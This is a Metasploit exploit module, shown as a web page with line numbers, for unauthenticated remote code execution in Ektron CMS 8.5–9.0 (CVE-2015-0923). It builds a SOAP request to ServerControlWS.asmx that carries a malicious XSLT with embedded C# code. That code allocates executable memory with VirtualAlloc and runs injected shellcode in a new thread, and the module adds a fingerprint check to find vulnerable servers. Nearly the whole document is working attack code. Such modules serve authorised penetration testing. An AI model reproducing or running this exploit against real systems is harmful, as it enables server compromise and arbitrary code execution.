CoCalc -- ektron_xslt_exec

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
¹⁹⁷¹⁵ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::EXE
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
17
        'Description' => %q{
18
          Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
19
          vulnerabilities in various operations within the ServerControlWS.asmx
20
          web services. These vulnerabilities allow for RCE without authentication and
21
          execute in the context of IIS on the remote system.
22
        },
23
        'Author' => [
24
          'catatonicprime'
25
        ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2015-0923' ],
29
          [ 'US-CERT-VU', '377644' ],
30
          [ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
31
        ],
32
        'Payload' => {
33
          'Space' => 2048,
34
          'StackAdjustment' => -3500
35
        },
36
        'Platform' => 'win',
37
        'Privileged' => true,
38
        'Targets' => [
39
          ['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]
40
        ],
41
        'DefaultTarget' => 0,
42
        'DisclosureDate' => '2015-02-05',
43
        'Notes' => {
44
          'Reliability' => UNKNOWN_RELIABILITY,
45
          'Stability' => UNKNOWN_STABILITY,
46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
        }
48
      )
49
    )
50

51
    register_options(
52
      [
53
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
54
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
55
        OptEnum.new('TARGETOP',
56
                    [
57
                      true,
58
                      'The vulnerable web service operation to exploit',
59
                      'ContentBlockEx',
60
                      [
61
                        'ContentBlockEx',
62
                        'GetBookmarkString',
63
                        'GetContentFlaggingString',
64
                        'GetContentRatingString',
65
                        'GetMessagingString'
66
                      ]
67
                    ])
68
      ]
69
    )
70
  end
71

72
  def vulnerable_param
73
    return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'
74

75
    'xslt'
76
  end
77

78
  def required_params
79
    return '' if datastore['TARGETOP'] == 'ContentBlockEx'
80

81
    '<showmode/>'
82
  end
83

84
  def target_operation
85
    datastore['TARGETOP']
86
  end
87

88
  def prologue
89
    <<~XSLT
90
      <?xml version="1.0" encoding="utf-8"?>
91
      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
92
        <soap:Body>
93
          <#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
94
            #{required_params}
95
            <#{vulnerable_param}>
96
              <![CDATA[
97
              <xsl:transform version="2.0"
98
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
99
                xmlns:msxsl="urn:schemas-microsoft-com:xslt"
100
                xmlns:user="http://mycompany.com/mynamespace">
101
                <msxsl:script language="C#" implements-prefix="user">
102
    XSLT
103
  end
104

105
  def epilogue
106
    <<~XSLT
107
                </msxsl:script>
108
                <xsl:template match="/">
109
                  <xsl:value-of select="user:xml()"/>
110
                </xsl:template>
111
              </xsl:transform>
112
              ]]>
113
            </#{vulnerable_param}>
114
          </#{target_operation}>
115
        </soap:Body>
116
      </soap:Envelope>
117
    XSLT
118
  end
119

120
  def check
121
    fingerprint = rand_text_alpha(5 + rand(5))
122
    xslt_data = <<~XSLT
123
      #{prologue}
124
                  public string xml() {
125
                    return "#{fingerprint}";
126
                  }
127
      #{epilogue}
128
    XSLT
129

130
    res = send_request_cgi(
131
      {
132
        'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
133
        'version' => '1.1',
134
        'method' => 'POST',
135
        'ctype' => "text/xml; charset=UTF-8",
136
        'headers' => {
137
          "Referer" => build_referer
138
        },
139
        'data' => xslt_data
140
      }
141
    )
142

143
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
144
      return Exploit::CheckCode::Vulnerable
145
    end
146

147
    return Exploit::CheckCode::Safe
148
  end
149

150
  def uri_path
151
    uri_path = target_uri.path
152
    uri_path << "/" if uri_path[-1, 1] != "/"
153
    uri_path
154
  end
155

156
  def build_referer
157
    if datastore['SSL']
158
      schema = "https://"
159
    else
160
      schema = "http://"
161
    end
162

163
    referer = schema
164
    referer << rhost
165
    referer << ":#{rport}"
166
    referer << uri_path
167
    referer
168
  end
169

170
  def exploit
171
    print_status("Generating the EXE Payload and the XSLT...")
172
    fingerprint = rand_text_alpha(5 + rand(5))
173

174
    xslt_data = <<~XSLT
175
      #{prologue}
176
                  private static UInt32 MEM_COMMIT = 0x1000;
177
                  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
178

179
                  [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
180
                  private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
181

182
                  [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
183
                  private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
184

185
                  public string xml()
186
                  {
187
                    string shellcode64 = @&quot;#{Rex::Text.encode_base64(payload.encoded)}&quot;;
188
                    byte[] shellcode = System.Convert.FromBase64String(shellcode64);
189
                    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
190
                    System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
191
                    IntPtr hThread = IntPtr.Zero;
192
                    IntPtr pinfo = IntPtr.Zero;
193
                    UInt32 threadId = 0;
194
                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
195
                    return &quot;#{fingerprint}&quot;;
196
                  }
197
      #{epilogue}
198
    XSLT
199

200
    print_status("Trying to run the xslt transformation...")
201
    res = send_request_cgi(
202
      {
203
        'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
204
        'version' => '1.1',
205
        'method' => 'POST',
206
        'ctype' => "text/xml; charset=UTF-8",
207
        'headers' => {
208
          "Referer" => build_referer
209
        },
210
        'data' => xslt_data
211
      }
212
    )
213
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
214
      print_good("Exploitation was successful")
215
    else
216
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
217
    end
218
  end
219
end
220

221
Product

Resources

Company
